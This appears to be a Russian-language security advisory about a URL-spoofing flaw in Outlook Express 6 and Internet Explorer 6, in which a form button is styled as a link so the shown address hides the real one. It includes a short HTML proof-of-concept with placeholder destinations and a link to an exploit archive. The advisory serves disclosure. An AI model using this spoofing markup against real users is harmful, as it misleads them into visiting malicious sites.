Некорректное отображение ссылок внедренных в данные формы в Microsoft Outlook Express и Microsoft Internet Explorer

Дата публикации:
02.04.2004
Дата изменения:
17.10.2006
Всего просмотров:
2141
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Outlook Express 6.0 и Microsoft Internet Explorer 6.0

Описание: Уязвимость обнаружена в Microsoft Outlook Express и Microsoft Internet Explorer. Удаленный пользователь может сконструировать HTML с внедренной ссылкой, которая подменит другой URL и заставит браузер отобразить неправильный URL.

Пример:

<A href="http://[apparent destination]">
<FORM action=[actual destination] method=get>
<INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;
TEXT-DECORATION: underline" type=submit value=http://[apparent destination]>
</A>

Пример/Эксплоит: http://www.malware.com/not-so-good.zip

URL производителя: http://WWW.Microsoft.Com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: NOT GOOD: Outlook Express 6 + Internet Explorer 6

или введите имя

CAPTCHA